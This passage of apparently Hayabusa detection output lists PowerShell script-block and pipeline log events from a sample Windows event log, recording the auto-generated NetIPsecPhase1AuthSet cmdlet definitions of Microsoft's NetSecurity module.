$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.518 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
